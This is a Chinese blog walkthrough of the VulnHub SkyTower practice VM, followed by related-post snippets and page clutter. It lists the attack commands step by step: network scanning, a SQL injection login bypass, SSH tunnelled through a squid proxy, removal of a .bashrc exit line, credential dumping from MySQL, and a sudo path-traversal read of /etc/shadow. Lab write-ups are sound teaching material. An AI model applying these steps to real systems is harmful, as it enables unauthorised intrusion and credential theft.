Skytower

最新推荐文章于 2024-09-20 14:16:44 发布
最新推荐文章于 2024-09-20 14:16:44 发布
阅读量245 收藏 10
点赞数 5
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80154010/article/details/142262540
版权

主机发现

arp-scan -l

端口扫描

nmap -sV -sC -sT -O 192.168.215.200 -p-

浏览器访问

emil随便输 ,密码输入:

123'|| 1=1 #

登录进去后显示用户名和密码

getshell

尝试 ssh 连接 ,但是连接不上, 但是还开放了一个 3128 端口 ,应该是ssh的代理端口,

我们编辑代理试试

vim /etc/proxychains4.conf

开启一个代理

proxytunnel -a 6666 -p 192.168.215.200:3128 -d 192.168.215.200:22

#

-a 指定本地侦听端口
-p 使用代理IP和端口
-d 指定访问的目标和端口

ssh john@127.0.0.1 -p6666

但是我们会被踢下来

通过执行 /bin/bash 获取交换界面

ssh john@127.0.0.1 -p6666 /bin/bash

连接成功

查看一下 /bashrc 文件 ,是否配置了 john 用户不能登录

exit 删掉

sed -i '$d' .bashrc

成功删掉

此时重新登录便可登录成功

提权

sudo -l

发现 内核不能提权

只能尝试登录MySQL数据库看有没有其他用户信息

cd /var/www

ls

cat login.php

mysql -uroot -proot # 登录MySQL数据库

use SKyTech; # 选择 这个库

show tables; # 查看表

selec * from login # 查看表里的数据

继续连接sara 用户,重复之前的操作

ssh sara@127.0.0.1 -p6666 /bin/bash

sed -i '$d' .bashrc

ssh sara@127.0.0.1 -p6666

sudo -l

发现可以在/accounts/*使用使用root的cat和ls命令

sudo cat /accounts/../etc/shadow

sudo /bin/ls /accounts/ ../../root # 查看root下有什么文件

发现flag.txt

sudo /bin/cat /accounts/ ../../root/flag.txt # 查看它

找到 root 用户 的密码是 theskytower

su root # 切换root 用户

提权成功

Gigity123
关注
vuluhub-skytower-1渗透靶场SkyTower 1
ccccai22的博客
08-04 261
vuluhub-skytower-1渗透靶场SkyTower 1提权
SkyTower
幻影狐的博客
09-14 265
利用用户进行远程连接,但是发现连接失败了,前面有一个 3128 端口,是 squid-http 代理。查看到 root 目录下有一个 flag.txt 文件,查看后发现了 root 用户的密码。看到了 /accounts/* 可以利用这个目录去查看 /root 目录。在 SkyTech 库 login 表中找到了一下用户的邮箱和密码。找到了 mysql 数据库的用户名和密码,登录一下 mysql。email=1'||1#,发现好像是成功了,尝试登录。发现了 john 用户和用户的密码。
SkyTower靶机
m0_61995767的博客
07-30 1765
KeyTower打靶记录
skytower靶机
weixin_74232792的博客
07-31 297
用同样的方式列举root目录下的文件 sudo /bin/ls /accounts/../../../root/,发现有个flag文件,查看一下,有root用户的密码,直接切换root,成功提权。发现在accounts目录下有root权限,用以下命令查看shadow文件,cat /accounts/../etc/shadow。转换其他思路,想到刚才扫到了一个代理端口,并且开放了ssh,尝试用这个账号密码连接一下。切换从数据库中发现的其他用户,Sara用户是可以ssh连接的,另外一个不行。
vulnhub靶场SkyTower靶场
zzzzzzkeai的博客
12-08 578
vulnhub靶场--SkyTower靶场
SkyTower靶机复现
weixin_52956666的博客
07-31 507
发现ssh登陆失败,扫描端口的时候22端口状态不是open,但是3128端口开放, 是http-proxy是代理端口。因为有后台,所以数据库大概率有账号密码,cat /var/www/login.php。将网卡模式设置为仅主机模式,混杂模式设置为全部允许,并记录MAC地址。加入 ' || 1=1#进行闭合,发现闭合成功,并且爆出了账号密码。同理,vim /etc/proxychains4.conf 也一样。尝试构造sql注入,发现有报错回显,说明存在sql注入。点击注册,将靶机资源加入进入,点击启动。
SKYTOWER: 1超详细靶机实战
weixin_68615160的博客
07-31 474
下载之后解压发现是VirtualBox格式的我们下载一个VirtualBox,这是官网安装到默认路径就行打开后点击注册选择解压后的vbox文件然后点击左上角管理点击导出虚拟电脑,选中后下一步更改路径,然后一直下一步就得到了一个iso镜像文件用vmware打开默认网卡模式为仅主机,更改为nat模式。
SkyTower 靶机 - 详细流程
m0_73983897的博客
09-20 1055
流程:主机发现 - 端口扫描 - web渗透 - 获取shell - 权限提升 web渗透:在发现SQL注入后,首先尝试的便是Sqlmap利用,但无果,原因是数据库拒绝了外部连接;设置代理访问这块,提示的很明显,毕竟在网页上直接写着....proxychains ssh john@192.168.142.145 -t "命令"通过ssh的-t参数执行命令,算比较少见的,这里也可以执行系统命令,反弹shell等权限提升:期间也有直接利用cat包含。
SkyTower靶机渗透测试
weixin_58786230的博客
07-31 313
【代码】SkyTower靶机渗透测试。
小白的靶机VulnHub-SkyTower
wo41ge的博客
12-28 464
靶机地址:https://www.vulnhub.com/entry/skytower-1,96/ 开机界面 就是个这 同样是使用桥接 找到了此次CTF目标计算机IP地址:192.168.56.101 开放了22(filtered)、80、3128代理端口…盒子都有代理… 先访问网页试试 这边 直接 进行测试 发现 是可以sql注入的 得到用户名和密码 Username: john Password: hereisjohn 尝试 ssh 登录 发现 是不可以的 但是根据nmap扫出的结果 它是开了代
和oscp相似的靶机-hackthebox & vulnhub (OSCP-LIKE HACKTHEBOX & VULNHUB)
冬萍子癸水
04-06 3172
每台都做一做,然后记录在博客里.供自己和大家一起学习.
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8471
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
健身房管理系统代码系统 Springboot健身房管理系统(程序,中文注释)
09-26
健身房管理系统-健身房管理系统-健身房管理系统-健身房管理系统-健身房管理系统-健身房管理系统-健身房管理系统-健身房管理系统-健身房管理系统-健身房管理系统-健身房管理系统-健身房管理系统 1、资源说明:健身房管理系统源码,本资源内项目代码都经过测试运行成功,功能ok的情况下才上传的。 2、适用人群:计算机相关专业(如计算计、信息安全、大数据、人工智能、通信、物联网、自动化、电子信息等)在校学生、专业老师或者企业员工等学习者,作为参考资料,进行参考学习使用。 3、资源用途:本资源具有较高的学习借鉴价值,可以作为“参考资料”,注意不是“定制需求”,代码只能作为学习参考,不能完全复制照搬。需要有一定的基础,能够看懂代码,能够自行调试代码,能够自行添加功能修改代码。 4. 最新计算机软件毕业设计选题大全(文章底部有博主联系方式): https://blog.csdn.net/2301_79206800/article/details/135931154 技术栈、环境、工具、软件: ① 系统环境:Windows ② 开发语言:Java ③ 框架:SpringBoot ④ 架构:B/S、M
海思SDK及大量官方PDF文档:hi3516dv100 和RTP示例工程代码:HisiLive
09-26
海思SDK及大量官方PDF文档:hi3516dv100 和RTP示例工程代码:HisiLive
电池镍片自动检测设备_三维3D设计图纸.zip
09-26
电池镍片自动检测设备_三维3D设计图纸.zip
小微园区数字化建设方案.pptx
09-26
小微园区数字化建设方案
python科学数据笔记(Python Scientific lecture notes) 英文版
最新发布
09-26
主要介绍如何使用python来处理科学的大数据,NumPy,Matplotlib等都有大量的实例 I Getting started with Python for science 2 1 Scientific computing with tools and workflow 3 2 The Python language 8 3 NumPy: creating and manipulating numerical data 5 Matplotlib 6 Scipy : high-level scientific com II Advanced topics 7 Advanced Python Constructs 8 Advanced Numpy 9 Debugging code 10 Optimizing code 12 Image manipulation and processing using Numpy and Scipy
OpenGL高级编程与可视化系统开发-高级编程篇(2-10章).zip
09-26
OpenGL高级编程与可视化系统开发-高级编程篇(2-10章).zip
齿轮齿条式转向系统3D模型图纸 Solidworks设计 附STP.zip
09-26
齿轮齿条式转向系统3D模型图纸 Solidworks设计 附STP.zip
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值